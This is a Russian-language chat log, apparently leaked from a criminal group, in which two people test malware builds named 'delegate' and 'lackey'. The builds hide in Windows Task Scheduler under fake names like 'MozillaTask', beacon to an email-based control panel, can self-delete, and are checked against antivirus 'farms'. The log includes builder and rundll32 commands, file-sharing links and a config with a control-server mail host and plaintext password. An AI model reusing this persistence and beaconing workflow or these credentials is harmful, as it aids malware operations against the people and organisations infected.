[01.10.21 16:03:04] angelo:		mc
[01.10.21 16:03:08] brooks:		да это линух
[01.10.21 16:03:10] angelo:		ага )
[01.10.21 16:03:28] angelo:		окай, врублю убунту и зайду
[01.10.21 16:03:33] brooks:		может админка дурит
[01.10.21 16:03:38] angelo:		через путти не удобно
[01.10.21 16:03:47] brooks:		да можешь и из-под винды это сделать
[01.10.21 16:03:52] brooks:		как хочешь
[01.10.21 16:03:58] angelo:		да у меня ВМ с убунтой
[01.10.21 16:04:05] angelo:		для настройки хостов клиенту
[01.10.21 16:04:10] brooks:		ну поразвлекайся, если интересно
[01.10.21 16:04:23] angelo:		всё хотел на убунту пересесть типа хакер, но туповат для такого
[01.10.21 16:04:27] angelo:		интересно
[01.10.21 16:04:50] brooks:		файл лога не удаляй, а то новый не создастся
[01.10.21 16:05:10] angelo:		да знаешь, как-то не привык удалять то, чт оя не я делал
[01.10.21 16:05:15] brooks:		но можешь запомнить последнюю запись (время), запустить прогу, посмотришь, что посылает и что ей отправляется взад
[01.10.21 16:05:29] brooks:		не, просто там не так сделано
[01.10.21 16:05:42] brooks:		по уму бы надо если файл удален, создать новый
[01.10.21 16:05:57] brooks:		но я это упустил когда делал, а ща не охота
[01.10.21 16:06:02] brooks:		не очень это нужно
[01.10.21 16:06:39] angelo:		ну да, явно удобнее с созданием лога повторно
[04.10.21 10:45:29] brooks:		привет
[04.10.21 10:45:38] angelo:		привет
[04.10.21 10:45:41] angelo:		ща друг
[04.10.21 10:45:44] angelo:		10 минуток
[04.10.21 10:45:49] brooks:		освободишься - стучи
[04.10.21 10:45:55] angelo:		окай ! обязательно
[25.10.21 14:26:51] angelo:		привет !
[25.10.21 14:26:55] angelo:		нет (
[25.10.21 14:27:02] angelo:		какие смотреть ?
[25.10.21 14:27:18] angelo:		что билдом делал exe/dll ?
[25.10.21 14:27:48] angelo:		узнаю как там по ферме
[25.10.21 14:28:06] angelo:		у нас приоритет как я поня лна длл
[25.10.21 14:28:31] angelo:		посомтрю
[25.10.21 14:28:36] angelo:		ща у Димы узнаю как чего на фермах
[25.10.21 14:28:47] angelo:		они их шаманили
[25.10.21 14:29:01] angelo:		может можн ов полуавтоматическом хоть режиме
[26.10.21 08:33:16] angelo:		привет
[26.10.21 08:42:40] brooks:		:)
[26.10.21 08:43:42] angelo:		ты не ругайся ладно ?
[26.10.21 08:43:51] angelo:		я сегодня пострарабсь по ферме пройтись
[26.10.21 08:43:58] angelo:		жду ответа Диметриуса
[26.10.21 08:44:10] brooks:		если сегодня проверишь - будет замечательно
[27.10.21 09:19:44] brooks:		привет, не получилось вчера?
[27.10.21 09:19:54] angelo:		привет
[27.10.21 09:19:55] angelo:		нет
[27.10.21 09:20:00] angelo:		доступ только получил от Димы
[27.10.21 09:20:08] angelo:		начал вот
[27.10.21 09:20:16] angelo:		ддлку с новой сборки
[27.10.21 09:20:22] brooks:		напиши, как получится, я дергать просто так тоже не буду
[27.10.21 09:20:25] angelo:		автотесты не сделали  (
[27.10.21 09:20:30] angelo:		руками надо
[27.10.21 09:20:39] angelo:		по всем да пройтись ?
[27.10.21 09:20:51] brooks:		лучше бы да
[27.10.21 09:21:04] angelo:		и сколько времени давать на жизнь проги ?
[27.10.21 09:22:33] brooks:		ну смотри, она пишет письмо, ждет 5 минут, читает ответ, это был отстук, затем запрашивает новое задание, ждет 5 минут, читает ответ, если задание есть, дает запрос на скачивание, ждет 5 минут, принимает ответ и запускает задание на выполнение, а дальше иди в начало этого предложения :)
[27.10.21 09:22:52] angelo:		погодииии
[27.10.21 09:22:57] brooks:		я думаю тебе достаточно отстука
[27.10.21 09:22:59] angelo:		мы будем на ферме проверять весь процесс ?!
[27.10.21 09:23:03] angelo:		фууух
[27.10.21 09:23:06] angelo:		фууууууууууууууууууууууууууууууух
[27.10.21 09:23:19] angelo:		ты не представляешь на сколько геморно с фермами работать
[27.10.21 09:23:24] brooks:		ты спросил, сколько времени надо на проверку, я написал
[27.10.21 09:23:28] brooks:		но это полный цикл
[27.10.21 09:23:33] brooks:		проверь только отстук
[27.10.21 09:23:39] angelo:		окай
[27.10.21 09:24:00] brooks:		динчек вроде ограничивает 180 секунд? т.е. получится только отправить запрос
[27.10.21 09:24:19] angelo:		динчек не показатель вообще, чисто статика
[27.10.21 09:24:35] angelo:		и то, как понимаю очень не показательная
[27.10.21 09:24:35] brooks:		не,  там есть и динамика
[27.10.21 09:24:47] angelo:		есть, то мы её не юзаем вроде
[27.10.21 09:24:50] angelo:		причины не знаю
[27.10.21 09:24:55] angelo:		только ферма дает показатель
[27.10.21 09:25:02] brooks:		сливает данные
[27.10.21 09:25:09] angelo:		да
[27.10.21 09:25:13] brooks:		проверяй не более 10 минут
[27.10.21 09:25:21] angelo:		окай
[27.10.21 09:25:33] brooks:		пусть хотя бы один обмен данными пройдет полностью (отстук)
[27.10.21 09:26:03] angelo:		окай
[27.10.21 09:26:13] angelo:		всё блин, буду учиться программить
[27.10.21 09:26:18] angelo:		может хватит ума
[27.10.21 09:26:24] angelo:		надоело мне кнопочки нажимать (
[27.10.21 09:26:31] angelo:		хочу тоже быт умным
[27.10.21 09:26:57] brooks:		здесь проблема не в уме, тебе нужна задача, над которой ты будешь работать, и тогда получится
[27.10.21 09:27:13] brooks:		а если просто делать тестовые задачи и слушать курсы - ну я не очень верю в продуктивность такого подхода
[27.10.21 09:27:15] angelo:		да я даже язык не могу выбрать пол года
[27.10.21 09:27:32] angelo:		общаюсь с людьми и больше каши в голове
[27.10.21 09:27:36] angelo:		чем понимания
[27.10.21 09:27:50] brooks:		зайди на ххру, посмотри, где готовы больше платить (начинающим), и вперед
[27.10.21 09:28:21] brooks:		и чтобы был достаточно большой спрос, чтобы у тебя был выбор если что
[27.10.21 09:28:50] angelo:		ну вот и есть Питон Ява JS
[27.10.21 09:29:28] angelo:		но там везде чемоданы знаний к языку
[27.10.21 09:29:28] brooks:		js разьве самостоятельный язык?
[27.10.21 09:29:29] angelo:		откуда вы блин столько всего знаете плюс к языку
[27.10.21 09:30:18] brooks:		книги читаем :) читать умеешь?
[27.10.21 09:32:10] angelo:		только правда художественную )
[27.10.21 12:24:01] angelo:		ну он идет в куппе конечно
[27.10.21 12:24:01] angelo:		со всякими там псевдо языками типа КСС штмл
[27.10.21 12:24:01] angelo:		я люблю читать
[29.10.21 08:47:25] brooks:		привет
[29.10.21 08:47:27] brooks:		https://file.io/YglPWeuwGTfa
[29.10.21 08:47:41] brooks:		это полный закреп
[29.10.21 08:47:58] brooks:		освободишься от срочных дел и можно проверять
[29.10.21 08:51:51] angelo:		привет
[29.10.21 08:51:59] angelo:		сейчас проверю
[29.10.21 08:52:15] brooks:		ну на счет сейчас ты конечно погорячился
[29.10.21 08:52:21] brooks:		там тоже достаточно долго
[29.10.21 08:52:23] angelo:		проверяю только LLVM ?
[29.10.21 08:52:29] brooks:		даже если не всё
[29.10.21 08:52:47] brooks:		да всё надо проверять, но достаточно парыд нагрузок и обязательно 100
[29.10.21 08:53:03] angelo:		100 это тчо ?
[29.10.21 08:53:07] angelo:		напомни
[29.10.21 08:53:14] angelo:		я не буду открывать редми
[29.10.21 08:53:15] brooks:		самоудаление
[29.10.21 08:53:15] angelo:		)
[29.10.21 08:53:25] angelo:		понял
[29.10.21 08:53:27] brooks:		но надо передавать  id, а он в админке неправильный
[29.10.21 08:54:07] angelo:		ииииии ?
[29.10.21 08:54:13] angelo:		что делать
[29.10.21 08:54:17] brooks:		не знаю, это не ко мне
[29.10.21 08:54:39] brooks:		когда админка отдает задачи она правильно ставит id, а показывает неправильно
[29.10.21 08:54:57] angelo:		Рокко
[29.10.21 08:55:00] brooks:		рокко говорил, что есть способ заставить ее правильно показывать, но я не умею
[29.10.21 08:55:05] angelo:		но у них вчера были серьезные проблемы
[29.10.21 08:55:15] angelo:		надо уточнит ькак он сегодня
[29.10.21 08:55:15] brooks:		чего случилось?
[29.10.21 08:55:16] angelo:		ок
[29.10.21 08:55:26] angelo:		ломанули админку вчера
[29.10.21 08:55:38] brooks:		сначала надо все проверить, а уж потом 100
[29.10.21 08:55:45] brooks:		его сегодня можно не тревожить
[29.10.21 08:55:54] brooks:		сильно ломанули?
[29.10.21 08:56:02] brooks:		много потерь?
[29.10.21 08:56:21] angelo:		понял
[29.10.21 08:56:21] angelo:		ну вот они пыжуться
[29.10.21 08:56:21] angelo:		поломали прям
[29.10.21 08:56:33] angelo:		бекап старый но был
[29.10.21 08:56:55] brooks:		ну хоть не совсем всё потеряли
[29.10.21 09:02:40] angelo:		да, почему то бекапы не обновлялись
[29.10.21 09:03:03] brooks:		я отойду на полчаса-часик
[29.10.21 11:32:21] angelo:		архив битый
[29.10.21 11:32:38] brooks:		ща повторю
[29.10.21 11:33:45] brooks:		https://file.io/dNe0iSP9b5vb
[29.10.21 12:00:08] angelo:		блин
[29.10.21 12:00:13] angelo:		у меня тор глючит
[29.10.21 12:00:25] brooks:		я ща отойду
[29.10.21 12:01:57] angelo:		ладно
[29.10.21 12:02:04] angelo:		ты не ругайся
[29.10.21 12:02:10] angelo:		но опять не получилось
[29.10.21 12:02:16] angelo:		тор обрвал скачку
[29.10.21 12:02:25] brooks:		ща повторю
[29.10.21 12:02:32] angelo:		буду качать через ФФ
[29.10.21 12:05:49] brooks:		https://gofile.io/d/7BCY01
[29.10.21 12:07:13] angelo:		норм, это Тор браузере сегодня хромает
[29.10.21 12:07:30] brooks:		скачал?
[29.10.21 12:07:41] angelo:		да
[29.10.21 13:36:16] brooks:		я тебе нужен ща?
[29.10.21 13:36:26] brooks:		а то я опять отъеду на часик
[29.10.21 13:36:32] angelo:		мто
[29.10.21 13:36:36] angelo:		стой
[29.10.21 13:36:40] angelo:		сек
[29.10.21 13:37:02] angelo:		Error in 55.dll
[29.10.21 13:37:10] angelo:		Missing entry dllmain
[29.10.21 13:37:20] angelo:		rundll32 55.dll,dllmain
[29.10.21 13:37:32] angelo:		buildDelegate_x64 --conf=config.txt --source=delegate_x64.dll --target=55.dll
[29.10.21 13:37:43] angelo:		где я ошибся
[29.10.21 13:37:48] brooks:		это мсвс или ллвм?
[29.10.21 13:38:02] angelo:		ллвм
[29.10.21 13:38:37] brooks:		а покажи мне команду запуска
[29.10.21 13:38:53] angelo:		C:\1>rundll32 55.dll,dllmain
[29.10.21 13:39:08] brooks:		угу
[29.10.21 13:39:45] brooks:		попробуй пока ехе и сборку длл мсвс, я вернусь и найду, куда делась точка входа
[29.10.21 13:39:56] brooks:		очень надо отъехать
[29.10.21 13:40:02] angelo:		окай
[29.10.21 13:40:04] angelo:		давай
[29.10.21 13:40:08] brooks:		если что пиши, приду - прочитаю
[29.10.21 13:40:16] brooks:		я  выключать комп не буду
[29.10.21 13:40:27] angelo:		да я сам тут пока готовлю тогда
[29.10.21 13:40:32] angelo:		хорошо съездить
[29.10.21 15:35:38] brooks:		https://gofile.io/d/11EQ7Q
накосячил малость с длл, здесь исправленный вариант
[02.11.21 08:18:02] angelo:		Привет
[02.11.21 08:18:09] angelo:		прости вчера был день вырви глаз
[02.11.21 08:47:18] angelo:		привет
[02.11.21 08:47:32] brooks:		привет
[02.11.21 08:47:34] angelo:		друг мой, вчера никак не получилось проверить
[02.11.21 08:47:39] angelo:		тест
[02.11.21 08:47:46] angelo:		123
[02.11.21 08:47:50] angelo:		тест
[02.11.21 08:47:53] brooks:		привет
[02.11.21 08:47:57] angelo:		друг мой, вчера никак не мог
[02.11.21 08:48:04] angelo:		сейчас пью како и запускаю
[02.11.21 08:48:06] angelo:		хорошо ?
[02.11.21 08:48:11] brooks:		нормально все, проверяй
[02.11.21 08:48:12] angelo:		не обижайся (
[02.11.21 08:48:15] brooks:		конечно хорошо
[03.11.21 09:15:23] brooks:		https://file.io/ieatBURuaiOy
[03.11.21 09:15:43] brooks:		https://send.exploit.in/download/e2da114b25fd9c0d/#j0ZhWiCvOmuYVjlJwZENWA
[03.11.21 09:16:29] angelo:		спс
[03.11.21 09:22:35] angelo:		unknown.dat
[03.11.21 09:22:35] angelo:		как переименовывать напомни
[03.11.21 09:22:56] brooks:		0.rar.pgp
[03.11.21 09:23:08] angelo:		с file.io опять был обрыв закачки, хз почему, а с эксплойта скачалася
[03.11.21 09:23:19] brooks:		ну и ладно
[03.11.21 10:57:40] brooks:		я сервер запустил, попробуй
[03.11.21 10:58:04] angelo:		ок
[03.11.21 11:21:09] angelo:		buildDelegate_x64 --conf=config.txt --source=delegate_x64.dll --target=D64.dll
[03.11.21 11:21:29] brooks:		угу
[03.11.21 11:22:01] brooks:		аналогичто лакею, только вместо минмах в часах период отстука в минутах
[03.11.21 11:23:40] angelo:		понял
[03.11.21 11:29:04] angelo:		C:\Users\Pen\Downloads>rundll32 D64.dll,dllmain
[03.11.21 11:29:14] angelo:		просто дублирую
[03.11.21 11:29:24] brooks:		да, должно так запускаться
[03.11.21 11:29:30] angelo:		угу
[03.11.21 11:29:31] angelo:		норм
[03.11.21 11:29:34] angelo:		без ошибок
[03.11.21 11:29:37] brooks:		только укажи полный путь
[03.11.21 11:29:47] brooks:		к длл
[03.11.21 11:30:12] angelo:		я уже пустил так (
[03.11.21 11:30:22] angelo:		но я же запускал из папки с файлом
[03.11.21 11:32:17] brooks:		потом можешь утилитой поиска проверить наличие задачи, параметр - полное имя длл, как ты его указал после  rundll32.exe
[03.11.21 11:33:19] brooks:		если указать неполное имя и я его пропишу в задачу - рабочий каталог будет явно другой при запуске шедулером, и работать ничего не будет
[03.11.21 11:33:55] angelo:		последнее не поняля дурак
[03.11.21 11:34:36] angelo:		как понять пропишешь в задачу
[03.11.21 11:34:40] brooks:		у тебя есть утилита findtask, ей ищешь задачу
[03.11.21 11:34:53] angelo:		бота не вижу
[03.11.21 11:34:59] angelo:		ща пропишу полный пусть
[03.11.21 11:35:23] brooks:		прога при запуске ищет свой исполняемый файл (длл) в планировщике, если не находит - создает новую задачу в случайно выбранном каталоге
[03.11.21 11:35:35] angelo:		C:\Users\Pen\Downloads>rundll32 C:\Users\Pen\Downloads\D64.dll,dllmain
[03.11.21 11:35:43] brooks:		да
[03.11.21 11:36:31] brooks:		после установки отстук не делается, только при запуске планировщиком, чтобы не получилось так, что отстучала при ручном первом запуске а потом из-за проблем с запуском планировщиком молчала
[03.11.21 11:36:43] angelo:		id_4444 этой ?
[03.11.21 11:37:04] brooks:		т.е. если отстук есть - точно запущено планировщиком
[03.11.21 11:37:05] brooks:		вряд ли
[03.11.21 11:37:24] brooks:		ищи утилитой, она покажет путь и название задачи
[03.11.21 11:37:51] brooks:		findTask_x64.exe C:\Users\Pen\Downloads\D64.dll
[03.11.21 11:38:16] angelo:		прости а утилита где ?
[03.11.21 11:38:21] brooks:		или можешь взять в кавычки, если в пути будут пробелы:
findTask_x64.exe "C:\Users\Pen\Downloads\D64.dll"
[03.11.21 11:38:24] angelo:		она встроена
[03.11.21 11:38:26] angelo:		в винду ?
[03.11.21 11:38:33] angelo:		дефолтная
[03.11.21 11:38:43] brooks:		в архиве
[03.11.21 11:39:11] angelo:		аарррр
[03.11.21 11:39:17] angelo:		что я такой не понятливый то
[03.11.21 11:39:19] angelo:		понял
[03.11.21 11:39:58] angelo:		path "\Mozilla", task "MozillaTask"
[03.11.21 11:40:16] brooks:		ну посмотри вкладку Action
[03.11.21 11:40:23] brooks:		там должна быть твоя команда
[03.11.21 11:40:44] brooks:		проверь, через сколько минут идет отстук, когда будет следующий запуск
[03.11.21 11:41:12] brooks:		при запуске от юзера нет никаких гарантий,  что задача будет создана
[03.11.21 11:51:12] angelo:		так
[03.11.21 11:51:15] angelo:		заупщен был
[03.11.21 11:51:19] angelo:		4:38
[03.11.21 11:51:54] brooks:		отстук?
[03.11.21 11:51:58] angelo:		Репит тригеред афтер 4:16
[03.11.21 11:52:24] brooks:		сам думай, мне только про ошибки пиши
[03.11.21 11:53:32] brooks:		отойду на час
[03.11.21 11:53:36] angelo:		было бы чем думать
[03.11.21 11:53:40] angelo:		давай
[03.11.21 11:53:44] angelo:		а бот то стукнуть должен в админку ?
[03.11.21 11:53:58] angelo:		как было ране
[03.11.21 15:38:47] brooks:		запуск проги был?
[03.11.21 15:39:01] brooks:		я не вижу  в логах отстука
[03.11.21 15:39:08] angelo:		нет
[03.11.21 15:39:10] angelo:		не было
[03.11.21 15:39:17] angelo:		а потом меня стали насиловать ВСЕ
[03.11.21 15:39:19] angelo:		ВСЕЕЕЕ
[03.11.21 15:39:26] brooks:		посмотри в шедулере, был запуск или нет
[03.11.21 15:40:43] angelo:		если это в хистори должно быть то нету
[03.11.21 15:41:12] brooks:		нет, ты смотришь в планировщике, там написано, когда был последний запуск
[03.11.21 15:41:24] brooks:		и когда следующий, и ошибка, если произошла
[03.11.21 15:41:46] angelo:		в хистори задачи в шелдупере
[03.11.21 15:41:58] brooks:		ну в строке задачи
[03.11.21 15:42:35] angelo:		да
[03.11.21 15:42:38] angelo:		чето тупанул как всегда
[03.11.21 15:42:41] angelo:		пишет старт был
[03.11.21 15:42:50] brooks:		когда последний раз?
[03.11.21 15:43:00] brooks:		ты билдером обрабатывал?
[03.11.21 15:43:14] angelo:		обрабатывал конечно
[03.11.21 15:43:18] angelo:		запуск был в 4:38
[03.11.21 15:43:42] brooks:		покажи мне конфиг
[03.11.21 15:44:23] angelo:		minpause=0
maxpause=1
mail={test@14740-27223.bacloud.info|CKFYQ25SMyli2STV|14740-27223.bacloud.info|14740-27223.bacloud.info}
mail={w-1@14740-27223.bacloud.info}
[03.11.21 15:44:47] brooks:		это для лакея. а для делегата должен быть period
[03.11.21 15:45:13] angelo:		:tired_face:
[03.11.21 15:45:14] brooks:		запусти билдер, он покажет, какие поля должны быть в конфиге
[03.11.21 15:45:36] brooks:		не забудь удалить задачу
[03.11.21 15:46:10] brooks:		это немного разные проги, поэтому конфиги чуть-чуть отличаются
[03.11.21 15:46:43] angelo:		какой ставить период ?
[03.11.21 15:46:51] brooks:		10
[03.11.21 15:48:38] angelo:		через скольок его может найти прога файндтаск
[03.11.21 15:49:41] brooks:		при первом запуске она заканчивает работу сразу, как создаст задачу
[03.11.21 15:49:45] brooks:		после этого можно искать
[03.11.21 15:50:38] angelo:		пишет запуск через 2 минуту
[03.11.21 15:50:49] brooks:		ждем, будет отстук или нет
[03.11.21 15:50:59] brooks:		покажи мне строку запуска в задаче
[03.11.21 15:53:39] angelo:		написал ошибку
[03.11.21 15:53:50] brooks:		покажи строку запуска
[03.11.21 15:53:51] angelo:		сек
[03.11.21 15:53:58] brooks:		в вкладке action
[03.11.21 15:54:07] brooks:		как по-русски не знаю
[03.11.21 15:55:05] angelo:		C:\Windows\system32\rundll32.exe C:\Users\Pen\Downloads\Y64.dll,dllmain
[03.11.21 15:55:36] brooks:		правильно?
[03.11.21 15:55:48] brooks:		файлы есть?
[03.11.21 15:56:05] angelo:		конечн оесть ддлка
[03.11.21 15:56:16] brooks:		проверь
[03.11.21 15:56:25] angelo:		дай тебе ошибку напишу
[03.11.21 15:56:31] brooks:		давай
[03.11.21 15:57:03] angelo:		The task has not yet run (0x41303)
[03.11.21 16:00:16] brooks:		https://www.get-itsolutions.com/task-scheduler-0x41303-0x41306/#:~:text=Task%20Scheduler%200x41303%3A%20Task%20has%20not%20yet%20run.,the%20error%20code%20description%20this%20task%20is%20disabled.
[03.11.21 16:00:50] angelo:		ты издеваешься ?!
[03.11.21 16:01:02] brooks:		нет, так инет пишет
[03.11.21 16:01:14] angelo:		ну написал бы о чем речь
[03.11.21 16:01:17] brooks:		попробуй толкнуть задачу вручную
[03.11.21 16:01:55] angelo:		сделал
[03.11.21 16:02:19] brooks:		смотри процессы
[03.11.21 16:02:22] brooks:		есть?
[03.11.21 16:02:59] angelo:		напомни
[03.11.21 16:02:59] angelo:		какой смотреть
[03.11.21 16:03:07] brooks:		rundll32
[03.11.21 16:03:38] angelo:		есть
[03.11.21 16:03:54] brooks:		ну смотри, есть отстук или нет
[03.11.21 16:05:08] angelo:		сек
[03.11.21 16:05:11] angelo:		админка грузиться
[03.11.21 16:06:16] brooks:		посмотри еще как настроен триггер запуска
[03.11.21 16:06:33] brooks:		должно быть ежедневно с периодом как ты задал
[03.11.21 16:08:06] angelo:		ну да каждый
[03.11.21 16:08:07] angelo:		день
[03.11.21 16:08:24] brooks:		смотри отстук
[03.11.21 16:08:30] angelo:		не вижу бота
[03.11.21 16:08:31] angelo:		стука
[03.11.21 16:08:42] brooks:		ща посмотрю логи
[03.11.21 16:10:45] brooks:		а ничего в них нет :(
[03.11.21 16:11:38] angelo:		и Николас ушел !! ((
[03.11.21 16:11:52] angelo:		а мне нужно кровь из носа настроить тарфик с Хуникса на винду в Виртуал боксе !
[03.11.21 16:11:56] angelo:		черт !
[03.11.21 16:12:00] brooks:		пусть, я ща на отладчике гляну
[03.11.21 16:35:26] brooks:		ты смотрел сборку llvm,
[03.11.21 16:35:26] brooks:		?
[03.11.21 16:36:21] angelo:		да
[03.11.21 16:36:33] brooks:		попробуй мсвс
[03.11.21 16:37:42] brooks:		напиши результат
[03.11.21 16:37:50] brooks:		я ушел
[04.11.21 16:07:56] angelo:		((
[04.11.21 16:08:02] angelo:		нету результатов (
[04.11.21 16:08:47] angelo:		не вижу тебя я целый день, и дождь стучаит в окно, мне больно видеть, как грустит оно
[04.11.21 16:08:50] angelo:		что оно не знаю
[08.11.21 07:52:27] brooks:		привет
[08.11.21 07:52:36] brooks:		не смог прочитать твои сообщения, повтори
[08.11.21 07:53:00] angelo:		привет
[08.11.21 07:53:06] angelo:		я уже волноваться начал за тебя
[08.11.21 07:53:19] angelo:		не стукнуло ни разу в админку
[08.11.21 07:53:25] angelo:		запускал обе сборки
[08.11.21 07:53:28] brooks:		ни ллвм ни мсвс?
[08.11.21 07:53:32] angelo:		не сколько раз
[08.11.21 07:53:33] angelo:		да
[08.11.21 07:53:43] brooks:		ок, ща проверю
[08.11.21 09:41:40] brooks:		https://file.io/DUy7NxwArom2
https://ufile.io/9nfgvut4
попробуй
[08.11.21 10:04:55] brooks:		https://ufile.io/l0cmrh3a
это постман, ошибка в периоде отстука, первый раз правильно, как в конфиге, а дальше от 0 до 1 часа, а т.к. тестировали на этом же интервале, то ошибку было не видно
[08.11.21 10:12:12] angelo:		момент друг мой
[08.11.21 10:20:01] brooks:		скачал?
[08.11.21 10:39:47] angelo:		сейчас скчаю
[08.11.21 10:39:55] angelo:		прости меня тут оставили напопечение
[08.11.21 10:42:46] angelo:		ну какой мудак придумал эту капчу !
[08.11.21 10:43:16] angelo:		https://ufile.io/l0cmrh3a
[08.11.21 10:43:18] angelo:		пока не получается
[08.11.21 10:43:21] angelo:		рекапчку пройти не могу
[08.11.21 10:43:36] brooks:		давай свой сервер, через него кину
[08.11.21 10:43:45] angelo:		сек
[08.11.21 10:43:59] angelo:		смог
[08.11.21 10:44:08] angelo:		капча эта просто до ужаса убогая
[08.11.21 10:44:41] angelo:		получается запускатьсо второго ахива ?
[08.11.21 10:44:43] angelo:		1
[08.11.21 10:45:19] brooks:		нет, второй просто исправленный лакей
[08.11.21 10:45:28] brooks:		бери где делегат
[08.11.21 16:09:51] brooks:		?
[08.11.21 16:10:50] angelo:		прости
[08.11.21 16:11:01] angelo:		:sweat:
[08.11.21 16:11:19] angelo:		мучают меня
[08.11.21 16:11:19] brooks:		:sob:
[08.11.21 16:11:27] angelo:		успокойся друг мой
[08.11.21 16:11:30] angelo:		не переживай
[08.11.21 16:11:34] angelo:		сейчас всё посмотрим
[08.11.21 16:11:42] angelo:		вот пярм через пару минуток
[08.11.21 16:55:54] angelo:		я тебя не игнорирую !!!!:crying_cat_face:
[08.11.21 16:56:07] angelo:		вот хотел врубить а тут пишут ПОЛОМАЛОСЬ НАДО СМОТРЕТЬ КЛИЕНТ ГОРИТ
[08.11.21 16:56:15] brooks:		ок
[09.11.21 07:27:13] angelo:		доброе утро дорогой !
[09.11.21 07:28:08] brooks:		привет
[09.11.21 07:28:36] angelo:		пока раздал задания есть врея
[09.11.21 07:28:50] angelo:		ты кинул две сборки
[09.11.21 07:28:51] brooks:		ок, пробуй
[09.11.21 07:29:12] brooks:		да, одна лаке, другая делегат, ты проверяешь делегата, он закрепляется в планировщике
[09.11.21 07:29:21] angelo:		ок
[09.11.21 07:29:44] brooks:		лакея проверяли
[09.11.21 07:29:46] angelo:		period=10
mail={test@14740-27223.bacloud.info|CKFYQ25SMyli2STV|14740-27223.bacloud.info|14740-27223.bacloud.info}
mail={w-1@14740-27223.bacloud.info}
[09.11.21 07:29:49] brooks:		там мелочь поправил
[09.11.21 07:29:51] angelo:		с таким конфигом ?
[09.11.21 07:29:59] brooks:		пойдет
[09.11.21 07:30:06] angelo:		если что изменить скажи
[09.11.21 07:31:15] angelo:		buildDelegate_x64 --conf=config.txt --source=delegate_x64.dll --target=64.dll
[09.11.21 07:34:17] brooks:		ага
[09.11.21 07:46:56] angelo:		не могу понять она ли в планировщике или нет
[09.11.21 07:47:44] brooks:		возьми finder в качестве параметра укажи полный путь к длл, которую ты запустил, должна найти в какой папке и как называется задача
[09.11.21 07:49:31] angelo:		C:\Users\Bil\Downloads>findTask_x64.exe "C:\Users\Bil\Downloads\64.dll"
[09.11.21 07:49:31] angelo:		я так пробовал
[09.11.21 07:49:46] brooks:		не нашла?
[09.11.21 07:49:49] angelo:		не-а
[09.11.21 07:49:58] angelo:		ошибка запуска
[09.11.21 07:49:59] angelo:		длл
[09.11.21 07:50:13] angelo:		C:\Users\Bil\Downloads>rundll32 64.dll,dllmain
[09.11.21 07:50:15] angelo:		запускал так
[09.11.21 07:50:26] angelo:		ошибка запуска длл приходит через пару минут почему то
[09.11.21 07:50:30] brooks:		полный путь укажи к 64.dll
[09.11.21 07:50:36] angelo:		мля
[09.11.21 07:50:38] brooks:		а поиском ищи 64.dll
[09.11.21 07:51:01] brooks:		если rundll запустился - должна быть и задача
[09.11.21 07:51:26] brooks:		C:\Users\Bil\Downloads>findTask_x64.exe 64.dll
[09.11.21 07:53:50] angelo:		ага есть
[09.11.21 07:53:53] angelo:		прост оTask
[09.11.21 07:53:59] angelo:		в шелдупере
[09.11.21 07:54:08] angelo:		ты заметил я машину назвал твоим именем ?
[09.11.21 07:54:12] brooks:		ты запускаешь от админа или юзера?
[09.11.21 07:54:15] angelo:		подсознательно наверно
[09.11.21 07:54:18] angelo:		юзера
[09.11.21 08:00:08] angelo:		вот бац и пришла обшика
[09.11.21 08:00:12] angelo:		запуска длл
[09.11.21 08:00:26] brooks:		какая?
[09.11.21 08:00:46] brooks:		покажи команду
[09.11.21 08:02:26] angelo:		C:\Users\Bil\Downloads>rundll32 C:\Users\Bil\Downloads\64.dll,dllmain
[09.11.21 08:02:36] angelo:		через 5 минут пришла ошибка запуска длл
[09.11.21 08:02:43] angelo:		модуль не был найден
[09.11.21 08:02:53] brooks:		это в планировщике?
[09.11.21 08:03:04] brooks:		а у тебя есть такой модуль?
[09.11.21 08:03:11] angelo:		есть
[09.11.21 08:03:16] angelo:		сейчас в планировщике покажу
[09.11.21 08:03:17] angelo:		сек
[09.11.21 08:03:26] brooks:		задача в планировщике есть?
[09.11.21 08:03:48] angelo:		C:\Windows\system32\rundll32.exe C:\Users\Bil\Downloads\64.dll,dllmain
[09.11.21 08:03:51] angelo:		есть
[09.11.21 08:04:13] brooks:		т.е. ты запустил прогу, она прописала себя в планировщик?
[09.11.21 08:04:19] angelo:		да
[09.11.21 08:04:23] angelo:		под именем ТАск
[09.11.21 08:04:25] angelo:		Task
[09.11.21 08:04:31] brooks:		смотри процессы, есть rundll32 или нет
[09.11.21 08:04:34] angelo:		и вот смотрю в Экшене команду запуска
[09.11.21 08:05:08] brooks:		разрешено выполнение только одного экземпляра, т.е. если прога запущена, то при попытке запустить снова будет ошибка
[09.11.21 08:05:24] brooks:		пока не выполнится текущий экземпляр, потом снова можно будет запустить прогу
[09.11.21 08:06:23] angelo:		ааа
[09.11.21 08:06:28] angelo:		есть рандлл да вижу
[09.11.21 08:06:52] brooks:		вот он и не даст запуститься второму экземпляру
[09.11.21 08:06:59] brooks:		смотри отстук, есть или нет
[09.11.21 08:07:11] brooks:		вчера почему-то серверная часть задурила
[09.11.21 08:18:22] angelo:		бот естьесли это мой
[09.11.21 08:18:30] angelo:		и снова вылезла ошибка запуска
[09.11.21 08:18:42] brooks:		еще не закончил работу, смотри процесс
[09.11.21 08:19:56] angelo:		закрыл ошибку
[09.11.21 08:19:56] angelo:		да
[09.11.21 08:20:01] angelo:		и снова два процесса ранд ддлл
[09.11.21 08:20:07] angelo:		по моей ддки
[09.11.21 08:20:34] brooks:		два не должно бы быть
[09.11.21 08:24:37] angelo:		вот закрыл ошибку
[09.11.21 08:24:40] angelo:		один длл в таске
[09.11.21 08:24:41] angelo:		ждем
[09.11.21 08:39:02] angelo:		все равно 2 рандлл и ошибка снова
[09.11.21 08:39:02] angelo:		могло произойти потому чт оя запустил два раза ?
[09.11.21 08:48:52] brooks:		ну можно сделать так, остановить все, потом удалить задачи, подождать 10 минут, что у тебя точно нет другого экземпляра в планировщике, и снова установить и следить за количеством
[09.11.21 08:49:20] brooks:		двух с одинаковым наименование длл не должно быть, я это проверяю, но если только ты с разными сделать сумел
[09.11.21 08:49:41] angelo:		удалил всё
[09.11.21 08:49:41] angelo:		ждем
[09.11.21 08:56:27] angelo:		ошибка запуска длл
[09.11.21 08:56:36] angelo:		после удаления в таске и шелдупере задачи
[09.11.21 08:56:39] angelo:		можт ну его ?
[09.11.21 08:56:47] angelo:		откачу ?
[09.11.21 08:57:05] brooks:		давай
[09.11.21 08:57:09] brooks:		так будет проще
[09.11.21 10:01:41] angelo:		запускал один раз
[09.11.21 10:01:41] angelo:		C:\Users\Bil\Downloads>rundll32 C:\Users\Bil\Downloads\64.dll,dllmain
